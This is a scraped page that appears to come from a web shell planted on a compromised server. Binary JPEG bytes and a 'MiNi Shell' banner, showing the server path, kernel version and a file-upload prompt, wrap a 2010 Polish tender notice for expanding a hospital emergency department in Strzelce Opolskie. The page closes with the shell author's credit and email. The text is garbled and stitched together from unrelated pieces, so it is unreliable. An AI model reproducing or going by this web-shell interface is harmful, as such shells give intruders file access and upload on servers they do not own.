JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100202/23213-N-2010.html

<p class="kh_header"><b>Strzelce Opolskie: Rozbudowa i modernizacja pomieszczeń Szpitalnego Oddziału Ratunkowego Szpitala Powiatowego w Strzelcach Opolskich</b><br>
<b>Numer ogłoszenia: 23213 - 2010; data zamieszczenia: 02.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki Zdrowotnej , ul. Opolska 36a, 47-100 Strzelce Opolskie, woj. opolskie, tel. 077 4613291-5, faks 077 4612763.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.strzelce-op.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i modernizacja pomieszczeń Szpitalnego Oddziału Ratunkowego Szpitala Powiatowego w Strzelcach Opolskich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie rozbudowy i modernizacji pomieszczeń Szpitalnego Oddziału Ratunkowego Szpitala Powiatowego w Strzelcach Opolskich.

1.	Ogólna charakterystyka istniejącego budynku
Budynek dwukondygnacyjny, częściowo podpiwniczony z dachem płaskim. Ściany konstrukcyjne murowane z cegły ceramicznej. Dach częściowo o drewnianej konstrukcji kryty papą na deskowaniu, a w części z płyt korytkowych. Schody z parteru do poziomu piętra żelbetowe.

2.	Rozbudowa budynku
polega na dobudowaniu traktu od strony północno-zachodniej i  klatki schodowej od strony południowo-zachodniej, dobudowie nowego podjazdu dla karetek                od strony południowo-zachodniej, zmianie funkcji pomieszczeń w istniejącej części budynku na parterze i na piętrze. Rozbudowa na parterze z przeznaczeniem na SOR, na pierwszym piętrze na oddział  dziecięcy. (2 743,98m3, 440,72 m2)
W  zakresie dotyczącym konstrukcji budowlanych przewiduje się następujące działania:
1)	Demontaż części ścianek działowych.
2)	Założenie nadproży i wykucie lub poszerzenie otworów w istniejących ścianach konstrukcyjnych w związku ze zmianami funkcji pomieszczeń.
3)	Rozbiórka części podokiennej dwóch otworów w ścianie zewnętrznej bez naruszenia nadproży.
4)	Wykonanie fundamentów części dobudowanej.
5)	Wykonanie słupów konstrukcji szkieletowej rozbudowy.
6)	Wykonanie rygli konstrukcji szkieletowej rozbudowy.
7)	Wykonanie ścian zewnętrznych murowanych.
8)	Wykonanie stropów masywnych nad parterem i piętrem rozbudowy.
9)	Wykonanie żelbetowych schodów ewakuacyjnych w projektowanej klatce schodowej

3.	Przebudowa
W części pomieszczeń parteru  i I pietra zostaną wyburzone ścianki działowe, wykonane nowe otwory w ścianach nośnych, zamurowanie części otworów istniejących, wykonanie nowego wyjścia ewakuacyjnego z budynku w elewacji północno- wschodniej.

4.	Instalacje sanitarne-zewnętrzne
Rozbudowa budynku wiąże się, z koniecznością przełożenia fragmentu sieci zewnętrznej c.o. wodnej, kanalizacji ogólnospławnej.

5.	Instalacje elektryczne
1)	Modernizacja rozdzielni głównej.
2)	Montaż wewnętrznych linii zasilających, w tym zasilania UPS, instalacja wyrównawcza, zasilanie gazowych strefowych zespołów kontrolnych SZK.
3)	Zasilanie jednostek medycznych: 
a.	zestawu-kolumna anestezjologiczna z lampą operacyjną -2 szt  w sali resustacyjnej,
b.	sufitowego zestawu dla 2 łóżek w sali intensywnej terapii,
c.	przyściennego panelu dla 3 łóżek w sali obserwacyjnej-2 szt.
4)	Budowa instalacji odbiorczych- oświetlenie oprawami sufitowymi, plafonierami oraz kinkietami  oraz w salach chorych na piętrze oprawy w  zestawach szpitalnych, jednocześnie Zamawiający rezygnuje z montażu lamp bakteriobójczych.
5)	Budowa instalacji przyzywowej, gniazd wtykowych, obwodów siłowych, zasilania wentylacji, odgromowej.
Instalacje elektryczne wraz z osprzętem w przebudowywanej części obiektu  w zakresie objętym dokumentacją wymienić lub zdemontować, przy czym maksymalnie należy wykorzystać istniejące urządzenia i instalacje pod warunkiem wykonania stosownych badań elektrycznych potwierdzających ich stan techniczny.

6.	Instalacja gazów medycznych
1)	Wpięcie się do istniejącej instalacji zasilania w tlen, podtlenek azotu, sprężone powietrze medyczne oraz próżnię  oraz  rozprowadzenie  tych  mediów do wyznaczonych pomieszczeń i miejsc poborów gazów.
2)	Odprowadzenie gazów poanestetycznych z miejsc, gdzie znajdują się odciągi tych gazów.
3)	Montaż ściennych punktów poboru
4)	Dostawa i montaż 
a.	zestawu-kolumna z lampą operacyjną -2 szt w sali resustacyjnej
b.	sufitowego zestawu dla 2 łóżek w sali intensywnej terapii
c.	przyściennego panelu dla 3 łóżek w sali obserwacyjnej-2 szt
5)	Dostawa i montaż urządzeń kontrolno-pomiarowych - strefowych zespołów kontrolnych (skrzynki zaworowe)  ze zintegrowanymi w nich urządzeniami sygnalizacji awaryjnej gazów medycznych.

7.	Instalacje teletechniczne
1)	Modernizacja instalacji komputerowej, telefonicznej, RTV- dodanie i likwidacja gniazd 
2)	Montaż systemu oddymiania na nowej klatce schodowej.

8.	Instalacje sanitarne-wewnętrzne
1)	Przebudowa instalacji wody zimnej i ciepłej, ppoż. hydrantowej, kanalizacji sanitarnej, c.o., wentylacji nawiewno- wywiewnej gabinetów zabiegowych,  wentylacji świetlicy i kuchni oraz wentylacji nawiewno-wywiewnej intensywnej terapii, resuscytacji i dyżurki lekarskiej.  
2)	Włączenie do istniejących instalacji obiektu wraz z demontażem instalacji oraz montażem nowych układów wentylacyjnych  w dobudowanych pomieszczeniach..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.40-0, 45.30.00.00-0, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Odnośnie spełniania warunku dotyczącego wiedzy i doświadczenia wykonawca winien wykazać się wykonaniem w okresie ostatnich pięciu lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwoma robotami budowlanymi polegającymi na budowie (alternatywnie: wykonanie, odbudowa, rozbudowa, nadbudowa) lub przebudowie budynku użyteczności publicznej (zdefiniowanego w Rozporządzeniu Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie - Dz.U. Nr 75, poz. 690) o wartości min. 1.200.000 zł.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Odnośnie warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający wymaga wykazania przez Wykonawcę dysponowaniem:
1)osobą, która pełnić będzie funkcję kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez żadnych ograniczeń,
2)osobami, które będą pełnić funkcję kierowników robót, posiadającymi uprawnienia do kierowania robotami budowlanymi określonymi przepisami Prawa budowlanego w specjalnościach:
a) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  wodociągowych, kanalizacyjnych oraz gazowych (gazów medycznych),
b) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych.
Zamawiający dopuszcza połączenie ww. funkcji pod warunkiem spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Odnośnie warunku dotyczącego sytuacji ekonomicznej i finansowej Wykonawca winien wykazać się posiadaniem ubezpieczenia                                 od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż 1.200.000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o spełnianiu warunków udziału w postępowaniu na podst. art. 22 ust 1 ustawy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>1.Szczególne znaczenie będzie miał warunek wykazania się wiedzą i doświadczeniem, w postaci wykonanych robót budowlanych, który stanowić będzie podstawę sporządzenia listy rankingowej,                    w przypadku gdy warunki udziału w postępowaniu będzie spełniało więcej niż                    5-ciu wykonawców. W takim przypadku Zamawiający zaprosi do składania ofert 5-ciu Wykonawców, którzy uzyskali najwyższą ilość punktów. 
2.Podstawą określenia kolejności na liście rankingowej będzie ilość robót budowlanych spełniających warunki określone przez Zamawiającego (wg zasady: 1 wykonana robota budowlana = 1 pkt).
3.W przypadku równej ilości wykonanych robót Zamawiający przyzna wyższą pozycję w rankingu temu Wykonawcy, którego łączna wartość robót spełniających warunki Zamawiającego, jest większa.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Szczegółowy zakres zmian umowy i warunków dokonania tych zmian zawarto w projekcie umowy, który stanowi załącznik do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ zostanie przekazana wykonawcom zaproszonym do skladania ofert..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2010 godzina 15:00, miejsce: Sekretariat Zespołu Opieki Zdrowotnej w Strzelcach Opolskich
ul. Opolska 36A
47-100 Strzelce Opolskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie będzie współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Infrastruktura i Środowisko, Oś priorytetowa XII Bezpieczeństwo zdrowotne i poprawa efektywności systemu ochrony zdrowia, Działanie 12.1 Rozwój systemu ratownictwa medycznego. Tytuł projektu: Zwiększenie dostępności i jakości specjalistycznych świadczeń zdrowotnych w Szpitalnym Oddziale Ratunkowym Zespołu Opieki Zdrowotnej z siedzibą w Strzelcach Opolskich poprzez rozbudowę obiektu i zakup nowej specjalistycznej aparatury.
Wniosek składany jest pisemnie. Na kopercie Wykonawca winien umieścić napis identyfikujący postępowanie, np. Wniosek o dopusczenie do udziału w postępowaniu na wykonanie rozbudowy i modernizacji pomieszczeń Szpitalnego Oddziału Ratunkowego Szpitala Powiatowego w Strzelcach Opolskich.
3. Wykonawca celem przedłożenia wymaganych oświadczeń i dokumentów na potwierdzenie spełniania warunków udziału w postępowaniu może skorzystać ze wzorów zamieszczonych na stronie internetowej Zamawiającego: www.szpital.strzelce-op.pl; zakładka: BIP; zakładka: Zamówienia publiczne: Przetargi 2010. 4. W przypadku podania przez Wykonawców w żądanych dokumentach, wartości pieniężnych w walutach obcych, Zamawiający dokona ich przeliczena na wartość wyrażoną w pieniądzu polskim, według średniego kursu NBP z dnia składania wniosków..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com